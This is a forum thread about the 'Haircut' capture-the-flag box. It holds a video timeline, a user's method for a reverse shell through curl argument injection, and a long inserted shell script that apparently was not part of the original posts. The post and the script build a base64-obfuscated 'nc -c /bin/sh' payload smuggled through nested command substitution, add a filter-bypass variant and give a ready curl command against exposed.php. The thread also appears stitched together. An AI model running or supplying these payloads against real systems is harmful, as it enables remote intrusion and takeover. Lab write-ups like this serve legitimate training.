Haircut Video by IppSec

01:45 - GoBuster: Discover exposed.php
04:40 - Exploiting exposed.php: Curl Argument Injection
11:40 - Getting Shell: nc, python3 to import pty.
20:09 - Screen Privesc: GNU Screen 4.5.0 - Local Privilege Escalation - Linux local Exploit

Saw your video, nice walkthrough. That bug with gcc where you had to modify the PATH had me scratching my head.

I thought some might be interested in how I did the initial shell.
Might be useful if you can't find a web app folder where you can write.

  1. Base64-encode your shell command for the reverse shell, i.e.
    echo "nc -c /bin/sh 10.10.15.152 4444" | base64
    → bmMgLWMgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo=
  2. Send the request with the field populated as such:
    http://localhost/test.html$($(echo bmMgLWMgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo= |base64 -d))
  3. enjoy your shell

If | were not allowed in the payload, you could first write to some file in /tmp and then decode that file afterwards.

Hope some find it useful.
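The procedure above, as an added worked example (not sajkox's own script, just a reconstruction of the three steps): it base64-encodes the reverse-shell command, wraps it in the nested $( ) command substitution, percent-encodes the result for a POST body, and also builds the two-request variant for the case where | is filtered. The field name formurl, the file path /tmp/.p and the $TARGET host are assumptions for illustration; the page only names exposed.php and the listener 10.10.15.152:4444.

```shell
#!/bin/sh
# Added example (not from the original post): build the payload sajkox describes.
# Assumptions not stated on the page: the injectable POST field of exposed.php is
# called "formurl", /tmp/.p is a scratch file, and $TARGET is the box address.

# Step 1: base64-encode the reverse-shell command. printf adds no trailing newline,
# so the decoded text is exactly the command; tr strips base64's own line wrapping.
encode_cmd() {
    printf '%s' "$1" | base64 | tr -d '\n'
}

# Step 2: wrap the encoded command in nested $( ). The inner $( ) decodes to the
# command text, the outer $( ) executes it when the target's shell expands the curl
# argument. The http://localhost/test.html prefix keeps the value looking like a URL.
build_payload() {
    bp_b64=$(encode_cmd "$1")
    printf 'http://localhost/test.html$($(echo %s | base64 -d))' "$bp_b64"
}

# Variant for the post's caveat (no | allowed): two requests. The first drops the
# base64 text into /tmp, the second decodes that file and runs the result.
build_payload_nopipe() {
    bpn_b64=$(encode_cmd "$1")
    printf 'http://localhost/test.html$(echo %s > /tmp/.p)\n' "$bpn_b64"
    printf 'http://localhost/test.html$($(base64 -d /tmp/.p))\n'
}

# Percent-encode so $, (, ), |, > and spaces survive inside a hand-built POST body
# (curl --data-urlencode would do this too; this is for pasting into a proxy).
urlencode() {
    ue_s=$1
    ue_out=""
    while [ -n "$ue_s" ]; do
        ue_c=${ue_s%"${ue_s#?}"}   # first character
        ue_s=${ue_s#?}
        case $ue_c in
            [A-Za-z0-9.~_-]) ue_out="$ue_out$ue_c" ;;
            *) ue_out="$ue_out$(printf '%%%02X' "'$ue_c")" ;;
        esac
    done
    printf '%s' "$ue_out"
}

# Local check: pull the base64 back out of a built payload and decode it, which is
# exactly what the target's shell does before executing the command.
decode_payload_cmd() {
    dp_b64=${1#*echo }
    dp_b64=${dp_b64%% | base64*}
    printf '%s' "$dp_b64" | base64 -d
}

# Usage (sends traffic, so only against your own lab box):
#   nc -lvnp 4444 &
#   TARGET=<box address>
#   curl -s "http://$TARGET/exposed.php" \
#        --data "formurl=$(urlencode "$(build_payload 'nc -c /bin/sh 10.10.15.152 4444')")"
```

Note that encode_cmd deliberately omits the trailing newline that `echo ... | base64` adds, so the encoded string ends in `NA==` rather than the `NAo=` in the post; both decode to a working command line, since the shell ignores the trailing newline.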

@sajkox said:
I thought some might be interested in how I did the initial shell.
Might be useful if you can't find a web app folder where you can write.

  1. Base64-encode your shell command for the reverse shell, i.e.
    echo "nc -c /bin/sh 10.10.15.152 4444" | base64
    → bmMgLWMgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo=
  2. Send the request with the field populated as such:
    http://localhost/test.html$($(echo bmMgLWMgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo= |base64 -d))
  3. enjoy your shell

If | were not allowed in the payload, you could first write to some file in /tmp and then decode that file afterwards.

Hope some find it useful.

Great info! Thanks for the tip.